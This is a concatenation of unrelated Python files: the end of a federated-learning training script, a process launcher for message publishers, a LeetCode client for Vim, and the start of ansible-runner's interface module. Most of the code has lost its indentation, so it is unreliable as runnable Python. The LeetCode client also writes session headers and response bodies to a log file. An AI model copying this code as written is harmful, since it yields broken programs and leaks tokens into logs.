device_index, samples, devices, args.Ka_consensus, args.N, number_of_batches, batch_size, args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
sio.savemat(
"CFA_device_{}_samples_{}_devices_{}_neighbors_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, args.N, number_of_batches, batch_size), dict_1)
elif parameter_server:
sio.savemat(
"results/matlab/FA_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size, args.noniid_assignment,args.run, args.random_data_distribution), dict_1)
sio.savemat(
"FA_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size), dict_1)
else: # CL
sio.savemat(
"results/matlab/CL_samples_{}_devices_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(samples, devices, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
break
if epoch_count > max_epochs: # stop simulation
print("Unsolved for device {} at epoch {}!".format(device_index, epoch_count))
training_end = True
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
# model_target.save(checkpointpath2, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
if federated:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices, "neighbors": args.N,
"active_devices": args.Ka_consensus,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
elif parameter_server:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"active_devices": active_devices_per_round,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
else:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
if federated:
sio.savemat(
"results/matlab/CFAS_device_{}_samples_{}_devices_{}_active_{}_neighbors_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, args.Ka_consensus, args.N, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
sio.savemat(
"CFA_device_{}_samples_{}_devices_{}_neighbors_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, args.N, number_of_batches, batch_size), dict_1)
elif parameter_server:
sio.savemat(
"results/matlab/FA_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
sio.savemat(
"FA_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size),
dict_1)
else: # CL
sio.savemat(
"results/matlab/CL_samples_{}_devices_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
samples, devices, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
break
if __name__ == "__main__":
if args.resume == 0: # clear all files
# DELETE TEMPORARY CACHE FILES
fileList = glob.glob('results/*.npy', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
fileList = glob.glob('results/*.h5', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
fileList = glob.glob('results/*.npz', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
fileList = glob.glob('*.mat', recursive=False)
print(fileList)
for filePath in fileList:
try:
os.remove(filePath)
except OSError:
print("Error while deleting file")
# main loop for multiprocessing
t = []
############# enable consensus based federation #######################
# federated = False
# federated = True
########################################################
##################### enable parameter server ##############
# parameter_server = False
server_index = devices
# parameter_server = True
#########################################################
samples = np.zeros(devices) # training samples per device
for id in range(devices):
# samples[id]=math.floor(w[id]*validation_train)
# samples[id] = math.floor(balancing_vect[id]*fraction_training)
samples[id] = training_set_per_device
# samples = int(fraction_training/devices) # training samples per device
######################### Create a non-iid assignment ##########################
# if args.noniid_assignment == 1:
# total_training_size = training_set_per_device * devices
# samples = get_noniid_data(total_training_size, devices, batch_size)
# while np.min(samples) < batch_size:
# samples = get_noniid_data(total_training_size, devices, batch_size)
#############################################################################
print(samples)
#################################### code testing CL learning (0: data center)
# federated = False
# parameter_server = False
# processData(0, validation_train, federated, validation_train, number_of_batches, parameter_server)
######################################################################################
if federated or parameter_server:
for ii in range(devices):
# position start
if ii == 0:
start_index = 0
else:
start_index = start_index + int(samples[ii-1])
t.append(threading.Thread(target=processData, args=(ii, start_index, int(samples[ii]), federated, validation_train, number_of_batches, parameter_server, samples)))
t[ii].start()
# last process is for the target server
if parameter_server:
print("Target server starting with active devices {}".format(active_devices_per_round))
t.append(threading.Thread(target=processParameterServer, args=(devices, active_devices_per_round, federated)))
t[devices].start()
else: # run centralized learning on device 0 (data center)
processData(0, 0, training_set_per_device*devices, federated, validation_train, number_of_batches, parameter_server, samples)
exit(0)
|
publishers.py
|
import sys
import time
from requests import get
from multiprocessing import Process
from publisher import run_publisher
from stats import *
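# Spawn `count` publisher processes; each gets an ID derived from this host's
# public IP so IDs stay unique across machines.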
def run_producers(procs, count: int, duration, hosts, topics):
# Get unique IDs for the producers
public_ip = get('https://api.ipify.org').text
addr_part = public_ip.split('.')[1]
for i in range(0, count):
id = addr_part + str(i)
pubProcess = Process(target=run_publisher, args=(id, topics, hosts, duration))
procs.append(pubProcess)
pubProcess.start()
if __name__ == '__main__':
if len(sys.argv) < 5:
print("Usage: python src/publishers.py <no. pubs> <duration (s)> <zk hosts...> <topics...>")
        sys.exit(1)
count = int(sys.argv[1])
duration = float(sys.argv[2])
hosts = []
topics = []
for i in range(3, len(sys.argv)):
arg = sys.argv[i]
if ":" in arg:
hosts.append(arg)
else:
topics.append(arg)
    procs = []
    run_producers(procs, count, duration, hosts, topics)
|
leetcode.py
|
import json
import logging
import re
import time
import os
from threading import Semaphore, Thread, current_thread
try:
from bs4 import BeautifulSoup
import requests
inited = 1
except ImportError:
inited = 0
try:
import vim
except ImportError:
vim = None
LC_BASE = os.environ['LEETCODE_BASE_URL']
LC_CSRF = LC_BASE + '/ensure_csrf/'
LC_LOGIN = LC_BASE + '/accounts/login/'
LC_GRAPHQL = LC_BASE + '/graphql'
LC_CATEGORY_PROBLEMS = LC_BASE + '/api/problems/{category}'
LC_PROBLEM = LC_BASE + '/problems/{slug}/description'
LC_TEST = LC_BASE + '/problems/{slug}/interpret_solution/'
LC_SUBMIT = LC_BASE + '/problems/{slug}/submit/'
LC_SUBMISSIONS = LC_BASE + '/api/submissions/{slug}'
LC_SUBMISSION = LC_BASE + '/submissions/detail/{submission}/'
LC_CHECK = LC_BASE + '/submissions/detail/{submission}/check/'
LC_PROBLEM_SET_ALL = LC_BASE + '/problemset/all/'
EMPTY_FREQUENCIES = [0, 0, 0, 0, 0, 0, 0, 0]
session = None
task_running = False
task_done = False
task_trigger = Semaphore(0)
task_name = ''
task_input = None
task_progress = ''
task_output = None
task_err = ''
log = logging.getLogger(__name__)
log.setLevel(logging.ERROR)
def enable_logging():
out_hdlr = logging.FileHandler('leetcode-vim.log')
out_hdlr.setFormatter(logging.Formatter('%(asctime)s %(message)s'))
out_hdlr.setLevel(logging.INFO)
log.addHandler(out_hdlr)
log.setLevel(logging.INFO)
def _make_headers():
assert is_login()
headers = {'Origin': LC_BASE,
'Referer': LC_BASE,
'X-CSRFToken': session.cookies['csrftoken'],
'X-Requested-With': 'XMLHttpRequest'}
return headers
def _level_to_name(level):
if level == 1:
return 'Easy'
if level == 2:
return 'Medium'
if level == 3:
return 'Hard'
return ' '
def _state_to_flag(state):
if state == 'ac':
return 'X'
if state == 'notac':
return '?'
return ' '
def _status_to_name(status):
if status == 10:
return 'Accepted'
if status == 11:
return 'Wrong Answer'
if status == 12:
return 'Memory Limit Exceeded'
if status == 13:
return 'Output Limit Exceeded'
if status == 14:
return 'Time Limit Exceeded'
if status == 15:
return 'Runtime Error'
if status == 16:
return 'Internal Error'
if status == 20:
return 'Compile Error'
if status == 21:
return 'Unknown Error'
return 'Unknown State'
def _break_code_lines(s):
return s.replace('\r\n', '\n').replace('\xa0', ' ').split('\n')
def _break_paragraph_lines(s):
lines = _break_code_lines(s)
result = []
# reserve one and only one empty line between two non-empty lines
for line in lines:
if line.strip() != '': # a line with only whitespaces is also empty
result.append(line)
result.append('')
return result
def _remove_description(code):
eod = code.find('[End of Description]')
if eod == -1:
return code
eol = code.find('\n', eod)
if eol == -1:
return ''
return code[eol+1:]
def is_login():
return session and 'LEETCODE_SESSION' in session.cookies
def signin(username, password):
global session
session = requests.Session()
if 'cn' in LC_BASE:
res = session.get(LC_CSRF)
else:
res = session.get(LC_LOGIN)
if res.status_code != 200:
_echoerr('cannot open ' + LC_BASE)
return False
headers = {'Origin': LC_BASE,
'Referer': LC_LOGIN}
form = {'csrfmiddlewaretoken': session.cookies['csrftoken'],
'login': username,
'password': password}
log.info('signin request: headers="%s" login="%s"', headers, username)
# requests follows the redirect url by default
# disable redirection explicitly
res = session.post(LC_LOGIN, data=form, headers=headers, allow_redirects=False)
log.info('signin response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 302:
_echoerr('password incorrect')
return False
return True
def _get_category_problems(category):
headers = _make_headers()
url = LC_CATEGORY_PROBLEMS.format(category=category)
res = session.get(url, headers=headers)
if res.status_code != 200:
_echoerr('cannot get the category: {}'.format(category))
return []
problems = []
content = res.json()
for p in content['stat_status_pairs']:
# skip hidden questions
if p['stat']['question__hide']:
continue
problem = {'state': _state_to_flag(p['status']),
'id': p['stat']['question_id'],
'fid': p['stat']['frontend_question_id'],
'title': p['stat']['question__title'],
'slug': p['stat']['question__title_slug'],
'paid_only': p['paid_only'],
'ac_rate': p['stat']['total_acs'] / p['stat']['total_submitted'],
'level': _level_to_name(p['difficulty']['level']),
'favor': p['is_favor'],
'category': content['category_slug'],
'frequency': p['frequency']}
problems.append(problem)
return problems
def get_problems(categories):
assert is_login()
problems = []
for c in categories:
problems.extend(_get_category_problems(c))
return sorted(problems, key=lambda p: p['id'])
def get_problem(slug):
assert is_login()
headers = _make_headers()
headers['Referer'] = LC_PROBLEM.format(slug=slug)
body = {'query': '''query getQuestionDetail($titleSlug : String!) {
question(titleSlug: $titleSlug) {
questionId
title
content
stats
difficulty
codeDefinition
sampleTestCase
enableRunCode
translatedContent
}
}''',
'variables': {'titleSlug': slug},
'operationName': 'getQuestionDetail'}
log.info('get_problem request: url="%s" headers="%s" body="%s"', LC_GRAPHQL, headers, body)
res = session.post(LC_GRAPHQL, json=body, headers=headers)
log.info('get_problem response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get the problem: {}'.format(slug))
return None
q = res.json()['data']['question']
content = q['translatedContent'] or q['content']
if content is None:
_echoerr('cannot get the problem: {}'.format(slug))
return None
soup = BeautifulSoup(content, features='html.parser')
problem = {}
problem['id'] = q['questionId']
problem['title'] = q['title']
problem['slug'] = slug
problem['level'] = q['difficulty']
problem['desc'] = _break_paragraph_lines(soup.get_text())
problem['templates'] = {}
for t in json.loads(q['codeDefinition']):
problem['templates'][t['value']] = _break_code_lines(t['defaultCode'])
problem['testable'] = q['enableRunCode']
problem['testcase'] = q['sampleTestCase']
stats = json.loads(q['stats'])
problem['total_accepted'] = stats['totalAccepted']
problem['total_submission'] = stats['totalSubmission']
problem['ac_rate'] = stats['acRate']
return problem
def _split(s):
    # str.split has a disadvantage that ''.split('\n') results in [''], but what we want
# is []. This small function returns [] if `s` is a blank string, that is, containing no
# characters other than whitespaces.
if s.strip() == '':
return []
return s.split('\n')
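# Poll the submission-check endpoint once a second until the judge reports
# SUCCESS, updating task_progress along the way so the async task can show a
# progress bar, then normalise the JSON into a result dict.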
def _check_result(submission_id):
global task_progress
if _in_task():
prog_stage = 'Uploading '
prog_bar = '.'
task_progress = prog_stage + prog_bar
while True:
headers = _make_headers()
url = LC_CHECK.format(submission=submission_id)
log.info('check result request: url="%s" headers="%s"', url, headers)
res = session.get(url, headers=headers)
log.info('check result response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get the execution result')
return None
if _in_task():
prog_bar += '.'
r = res.json()
if r['state'] == 'SUCCESS':
prog_stage = 'Done '
break
elif r['state'] == 'PENDING':
prog_stage = 'Pending '
elif r['state'] == 'STARTED':
prog_stage = 'Running '
if _in_task():
task_progress = prog_stage + prog_bar
time.sleep(1)
result = {
'answer': r.get('code_answer', []),
'runtime': r['status_runtime'],
'state': _status_to_name(r['status_code']),
'testcase': _split(r.get('input', r.get('last_testcase', ''))),
'passed': r.get('total_correct') or 0,
'total': r.get('total_testcases') or 0,
'error': [v for k, v in r.items() if 'error' in k and v]
}
# the keys differs between the result of testing the code and submitting it
# for submission judge_type is 'large', and for testing judge_type does not exist
if r.get('judge_type') == 'large':
result['answer'] = _split(r.get('code_output', ''))
result['expected_answer'] = _split(r.get('expected_output', ''))
result['stdout'] = _split(r.get('std_output', ''))
result['runtime_percentile'] = r.get('runtime_percentile', '')
else:
# Test states cannot distinguish accepted answers from wrong answers.
if result['state'] == 'Accepted':
result['state'] = 'Finished'
result['stdout'] = r.get('code_output', [])
result['expected_answer'] = []
result['runtime_percentile'] = r.get('runtime_percentile', '')
return result
def test_solution(problem_id, title, slug, filetype, code, test_input):
assert is_login()
code = _remove_description(code)
headers = _make_headers()
headers['Referer'] = LC_PROBLEM.format(slug=slug)
body = {'data_input': test_input,
'lang': filetype,
'question_id': str(problem_id),
'test_mode': False,
'typed_code': code}
url = LC_TEST.format(slug=slug)
log.info('test solution request: url="%s" headers="%s" body="%s"', url, headers, body)
res = session.post(url, json=body, headers=headers)
log.info('test solution response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
if 'too fast' in res.text:
_echoerr('you are sending the request too fast')
else:
_echoerr('cannot test the solution for ' + slug)
return None
actual = _check_result(res.json()['interpret_id'])
expected = _check_result(res.json()['interpret_expected_id'])
actual['testcase'] = test_input.split('\n')
actual['expected_answer'] = expected['answer']
actual['title'] = title
return actual
def test_solution_async(problem_id, title, slug, filetype, code, test_input):
assert is_login()
global task_input, task_name
if task_running:
_echoerr('there is other task running: ' + task_name)
return False
code = _remove_description(code)
task_name = 'test_solution'
task_input = [problem_id, title, slug, filetype, code, test_input]
task_trigger.release()
return True
def submit_solution(slug, filetype, code=None):
assert is_login()
problem = get_problem(slug)
if not problem:
return None
if code is None:
code = '\n'.join(vim.current.buffer)
code = _remove_description(code)
headers = _make_headers()
headers['Referer'] = LC_PROBLEM.format(slug=slug)
body = {'data_input': problem['testcase'],
'lang': filetype,
'question_id': str(problem['id']),
'test_mode': False,
'typed_code': code,
'judge_type': 'large'}
url = LC_SUBMIT.format(slug=slug)
log.info('submit solution request: url="%s" headers="%s" body="%s"', url, headers, body)
res = session.post(url, json=body, headers=headers)
log.info('submit solution response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
if 'too fast' in res.text:
_echoerr('you are sending the request too fast')
else:
_echoerr('cannot submit the solution for ' + slug)
return None
result = _check_result(res.json()['submission_id'])
result['title'] = problem['title']
return result
def submit_solution_async(slug, filetype, code=None):
assert is_login()
global task_input, task_name
if task_running:
_echoerr('there is other task running: ' + task_name)
return False
if code is None:
code = '\n'.join(vim.current.buffer)
task_name = 'submit_solution'
task_input = [slug, filetype, code]
task_trigger.release()
return True
def get_submissions(slug):
assert is_login()
headers = _make_headers()
headers['Referer'] = LC_PROBLEM.format(slug=slug)
url = LC_SUBMISSIONS.format(slug=slug)
log.info('get submissions request: url="%s" headers="%s"', url, headers)
res = session.get(url, headers=headers)
log.info('get submissions response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot find the submissions of problem: ' + slug)
return None
submissions = []
for r in res.json()['submissions_dump']:
s = {
'id': r['url'].split('/')[3],
'time': r['time'].replace('\xa0', ' '),
'status': r['status_display'],
'runtime': r['runtime'],
}
submissions.append(s)
return submissions
def _group1(match, default):
if match:
return match.group(1)
return default
def _unescape(s):
return s.encode().decode('unicode_escape')
def get_submission(sid):
assert is_login()
headers = _make_headers()
url = LC_SUBMISSION.format(submission=sid)
log.info('get submission request: url="%s" headers="%s"', url, headers)
res = session.get(url, headers=headers)
log.info('get submission response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot find the submission: ' + sid)
return None
# we need to parse the data from the Javascript snippet
s = res.text
submission = {
'id': sid,
'state': _status_to_name(int(_group1(re.search(r"status_code: parseInt\('([^']*)'", s),
'not found'))),
'runtime': _group1(re.search("runtime: '([^']*)'", s), 'not found'),
'passed': _group1(re.search("total_correct : '([^']*)'", s), 'not found'),
'total': _group1(re.search("total_testcases : '([^']*)'", s), 'not found'),
'testcase': _split(_unescape(_group1(re.search("input : '([^']*)'", s), ''))),
'answer': _split(_unescape(_group1(re.search("code_output : '([^']*)'", s), ''))),
'expected_answer': _split(_unescape(_group1(re.search("expected_output : '([^']*)'", s),
''))),
'problem_id': _group1(re.search("questionId: '([^']*)'", s), 'not found'),
'slug': _group1(re.search("editCodeUrl: '([^']*)'", s), '///').split('/')[2],
'filetype': _group1(re.search("getLangDisplay: '([^']*)'", s), 'not found'),
'error': [],
'stdout': [],
}
problem = get_problem(submission['slug'])
submission['title'] = problem['title']
# punctuation and newlines in the code are escaped like '\\u000a' ('\\' => a real backslash)
# to unescape the string we use the trick '\\u000a'.encode().decode('unicode_escape') ==> '\n'
submission['code'] = _break_code_lines(_unescape(_group1(
re.search("submissionCode: '([^']*)'", s), '')))
dist_str = _unescape(_group1(re.search("runtimeDistributionFormatted: '([^']*)'", s),
'{"distribution":[]}'))
dist = json.loads(dist_str)['distribution']
dist.reverse()
# the second key "runtime" is the runtime in milliseconds
# we need to search from the position after the first "runtime" key
prev_runtime = re.search("runtime: '([^']*)'", s)
if not prev_runtime:
my_runtime = 0
else:
my_runtime = int(_group1(re.search("runtime: '([^']*)'", s[prev_runtime.end():]), 0))
accum = 0
for runtime, frequency in dist:
accum += frequency
if my_runtime >= int(runtime):
break
submission['runtime_percentile'] = '{:.1f}%'.format(accum)
return submission
def _process_topic_element(topic):
return {'topic_name': topic.find(class_='text-gray').string.strip(),
'num_problems': topic.find(class_='badge').string,
'topic_slug': topic.get('href').split('/')[2]}
def _process_company_element(company):
return {'company_name': company.find(class_='text-gray').string.strip(),
'num_problems': company.find(class_='badge').string,
'company_slug': company.get('href').split('/')[2]}
def get_topics_and_companies():
headers = _make_headers()
log.info('get_topics_and_companies request: url="%s"', LC_PROBLEM_SET_ALL)
res = session.get(LC_PROBLEM_SET_ALL, headers=headers)
log.info('get_topics_and_companies response: status="%s" body="%s"', res.status_code,
res.text)
if res.status_code != 200:
_echoerr('cannot get topics')
return []
soup = BeautifulSoup(res.text, features='html.parser')
topic_elements = soup.find_all(class_='sm-topic')
topics = [_process_topic_element(topic) for topic in topic_elements]
company_elements = soup.find_all(class_='sm-company')
companies = [_process_company_element(company) for company in company_elements]
return {
'topics': topics,
'companies': companies
}
def get_problems_of_topic(topic_slug):
request_body = {
'operationName':'getTopicTag',
'variables': {'slug': topic_slug},
'query': '''query getTopicTag($slug: String!) {
topicTag(slug: $slug) {
name
translatedName
questions {
status
questionId
questionFrontendId
title
titleSlug
translatedTitle
stats
difficulty
isPaidOnly
}
frequencies
}
}
'''}
headers = _make_headers()
log.info('get_problems_of_topic request: headers="%s" body="%s"', headers,
request_body)
res = session.post(LC_GRAPHQL, headers=headers, json=request_body)
log.info('get_problems_of_topic response: status="%s" body="%s"',
res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get problems of the topic')
return {'topic_name': topic_slug, 'problems': []}
topic_tag = res.json()['data']['topicTag']
if not topic_tag:
return {'topic_name': topic_slug, 'problems': []}
if topic_tag['frequencies']:
id_to_frequency_map = json.loads(topic_tag['frequencies'])
else:
id_to_frequency_map = {}
def process_problem(p):
stats = json.loads(p['stats'])
return {
'state': _state_to_flag(p['status']),
'id': p['questionId'],
'fid': p['questionFrontendId'],
'title': p['title'],
'slug': p['titleSlug'],
'paid_only': p['isPaidOnly'],
'ac_rate': stats['totalAcceptedRaw'] / stats['totalSubmissionRaw'],
'level': p['difficulty'],
'favor': False,
'frequency': id_to_frequency_map.get(p['questionId'], 0)}
return {
'topic_name': topic_tag['name'],
'problems': [process_problem(p) for p in topic_tag['questions']]}
def get_problems_of_company(company_slug):
request_body = {
'operationName':'getCompanyTag',
'variables': {'slug': company_slug},
'query': '''query getCompanyTag($slug: String!) {
companyTag(slug: $slug) {
name
translatedName
frequencies
questions {
...questionFields
}
}
}
fragment questionFields on QuestionNode {
status
questionId
questionFrontendId
title
titleSlug
translatedTitle
stats
difficulty
isPaidOnly
frequencyTimePeriod
}
'''}
headers = _make_headers()
headers['Referer'] = 'https://leetcode.com/company/{}/'.format(company_slug)
log.info('get_problems_of_company request: headers="%s" body="%s"', headers,
request_body)
res = session.post(LC_GRAPHQL, headers=headers, json=request_body)
log.info('get_problems_of_company response: status="%s" body="%s"',
res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get problems of the company')
return {'company_name': company_slug, 'problems': []}
company_tag = res.json()['data']['companyTag']
if not company_tag:
_echoerr('cannot get problems of the company')
return {'company_name': company_slug, 'problems': []}
if company_tag['frequencies']:
id_to_frequency_map = json.loads(company_tag['frequencies'])
else:
id_to_frequency_map = {}
def process_problem(p):
stats = json.loads(p['stats'])
return {
'state': _state_to_flag(p['status']),
'id': p['questionId'],
'fid': p['questionFrontendId'],
'title': p['title'],
'slug': p['titleSlug'],
'paid_only': p['isPaidOnly'],
'ac_rate': stats['totalAcceptedRaw'] / stats['totalSubmissionRaw'],
'level': p['difficulty'],
'favor': False,
'frequencies': id_to_frequency_map.get(p['questionId'],
EMPTY_FREQUENCIES)[4:]}
return {
'company_name': company_tag['name'],
'problems': [process_problem(p) for p in company_tag['questions']]}
def _thread_main():
global task_running, task_done, task_output, task_err
while True:
task_trigger.acquire()
task_running = True
task_done = False
task_output = None
task_err = ''
log.info('task thread input: name="%s" input="%s"', task_name, task_input)
try:
if task_name == 'test_solution':
task_output = test_solution(*task_input)
elif task_name == 'submit_solution':
task_output = submit_solution(*task_input)
except BaseException as e:
task_err = str(e)
log.info('task thread output: name="%s" output="%s" error="%s"', task_name, task_output,
task_err)
task_running = False
task_done = True
def _in_task():
return current_thread() == task_thread
def _echoerr(s):
global task_err
if _in_task():
task_err = s
else:
print(s)
task_thread = Thread(target=_thread_main, daemon=True)
task_thread.start()
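# A minimal caller-side sketch (assumed usage, not part of this module): the *_async
# helpers hand the work to the background task thread via task_trigger, and the caller
# is expected to poll the module-level flags until the task finishes.
#
#   if submit_solution_async(slug='two-sum', filetype='python3'):
#       while not task_done:
#           time.sleep(0.1)        # polling; a Vim timer would normally drive this
#       if task_err:
#           print(task_err)        # error text captured by _echoerr() in the task thread
#       else:
#           result = task_output   # the dict returned by submit_solution()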
|
interface.py
|
# Copyright (c) 2016 Ansible by Red Hat, Inc.
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import sys
import threading
import logging
from ansible_runner import output
from ansible_runner.runner_config import RunnerConfig
from ansible_runner.runner import Runner
from ansible_runner.streaming import Transmitter, Worker, Processor
from ansible_runner.utils import (
dump_artifacts,
check_isolation_executable_installed,
)
logging.getLogger('ansible-runner').addHandler(logging.NullHandler())
def init_runner(**kwargs):
'''
Initialize the Runner() instance
This function initializes both run() and run_async()
in the same way and returns a Runner instance.
See parameters given to :py:func:`ansible_runner.interface.run`
'''
if not kwargs.get('cli_execenv_cmd'):
dump_artifacts(kwargs)
debug = kwargs.pop('debug', None)
logfile = kwargs.pop('logfile', None)
if not kwargs.pop("ignore_logging", True):
output.configure()
if debug in (True, False):
output.set_debug('enable' if debug is True else 'disable')
if logfile:
output.set_logfile(logfile)
if kwargs.get("process_isolation", False):
pi_executable = kwargs.get("process_isolation_executable", "podman")
if not check_isolation_executable_installed(pi_executable):
print(f'Unable to find process isolation executable: {pi_executable}')
sys.exit(1)
event_callback_handler = kwargs.pop('event_handler', None)
status_callback_handler = kwargs.pop('status_handler', None)
artifacts_handler = kwargs.pop('artifacts_handler', None)
cancel_callback = kwargs.pop('cancel_callback', None)
finished_callback = kwargs.pop('finished_callback', None)
streamer = kwargs.pop('streamer', None)
if streamer:
if streamer == 'transmit':
stream_transmitter = Transmitter(**kwargs)
return stream_transmitter
if streamer == 'worker':
stream_worker = Worker(**kwargs)
return stream_worker
if streamer == 'process':
stream_processor = Processor(event_handler=event_callback_handler,
status_handler=status_callback_handler,
artifacts_handler=artifacts_handler,
cancel_callback=cancel_callback,
finished_callback=finished_callback,
**kwargs)
return stream_processor
kwargs.pop('_input', None)
kwargs.pop('_output', None)
rc = RunnerConfig(**kwargs)
rc.prepare()
return Runner(rc,
event_handler=event_callback_handler,
status_handler=status_callback_handler,
artifacts_handler=artifacts_handler,
cancel_callback=cancel_callback,
finished_callback=finished_callback)
def run(**kwargs):
'''
Run an Ansible Runner task in the foreground and return a Runner object when complete.
:param private_data_dir: The directory containing all runner metadata needed to invoke the runner
module. Output artifacts will also be stored here for later consumption.
:param ident: The run identifier for this invocation of Runner. Will be used to create and name
the artifact directory holding the results of the invocation.
:param json_mode: Store event data in place of stdout on the console and in the stdout file
:param playbook: The playbook (either supplied here as a list or string... or as a path relative to
``private_data_dir/project``) that will be invoked by runner when executing Ansible.
:param module: The module that will be invoked in ad-hoc mode by runner when executing Ansible.
:param module_args: The module arguments that will be supplied to ad-hoc mode.
:param host_pattern: The host pattern to match when running in ad-hoc mode.
:param inventory: Overrides the inventory directory/file (supplied at ``private_data_dir/inventory``) with
a specific host or list of hosts. This can take the form of
- Path to the inventory file in the ``private_data_dir``
- Native python dict supporting the YAML/json inventory structure
- A text INI formatted string
- A list of inventory sources, or an empty list to disable passing inventory
:param roles_path: Directory or list of directories to assign to ANSIBLE_ROLES_PATH
:param envvars: Environment variables to be used when running Ansible. Environment variables will also be
read from ``env/envvars`` in ``private_data_dir``
:param extravars: Extra variables to be passed to Ansible at runtime using ``-e``. Extra vars will also be
read from ``env/extravars`` in ``private_data_dir``.
:param passwords: A dictionary containing password prompt patterns and response values used when processing output from
Ansible. Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
:param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
be read from ``env/settings`` in ``private_data_dir``.
:param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
:param cmdline: Command line options passed to Ansible read from ``env/cmdline`` in ``private_data_dir``
:param limit: Matches ansible's ``--limit`` parameter to further constrain the inventory to be used
:param forks: Control Ansible parallel concurrency
:param verbosity: Control how verbose the output of ansible-playbook is
:param quiet: Disable all output
:param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir
:param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir
:param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default
:param streamer: Optionally invoke ansible-runner as one of the steps in the streaming pipeline
:param _input: An optional file or file-like object for use as input in a streaming pipeline
:param _output: An optional file or file-like object for use as output in a streaming pipeline
:param event_handler: An optional callback that will be invoked any time an event is received by Runner itself, return True to keep the event
:param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False)
:param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
:param status_handler: An optional callback that will be invoked any time the status changes (e.g. started, running, failed, successful, timeout)
:param artifacts_handler: An optional callback that will be invoked at the end of the run to deal with the artifacts from the run.
:param process_isolation: Enable process isolation, using either a container engine (e.g. podman) or a sandbox (e.g. bwrap).
:param process_isolation_executable: Process isolation executable or container engine used to isolate execution. (default: podman)
:param process_isolation_path: Path that an isolated playbook run will use for staging. (default: /tmp)
:param process_isolation_hide_paths: A path or list of paths on the system that should be hidden from the playbook run.
:param process_isolation_show_paths: A path or list of paths on the system that should be exposed to the playbook run.
:param process_isolation_ro_paths: A path or list of paths on the system that should be exposed to the playbook run as read-only.
:param container_image: Container image to use when running an ansible task (default: quay.io/ansible/ansible-runner:devel)
:param container_volume_mounts: List of bind mounts in the form 'host_dir:/container_dir'. (default: None)
:param container_options: List of container options to pass to execution engine.
:param resource_profiling: Enable collection of resource utilization data during playbook execution.
:param resource_profiling_base_cgroup: Name of existing cgroup which will be sub-grouped in order to measure resource utilization (default: ansible-runner)
:param resource_profiling_cpu_poll_interval: Interval (in seconds) between CPU polling for determining CPU usage (default: 0.25)
:param resource_profiling_memory_poll_interval: Interval (in seconds) between memory polling for determining memory usage (default: 0.25)
:param resource_profiling_pid_poll_interval: Interval (in seconds) between polling PID count for determining number of processes used (default: 0.25)
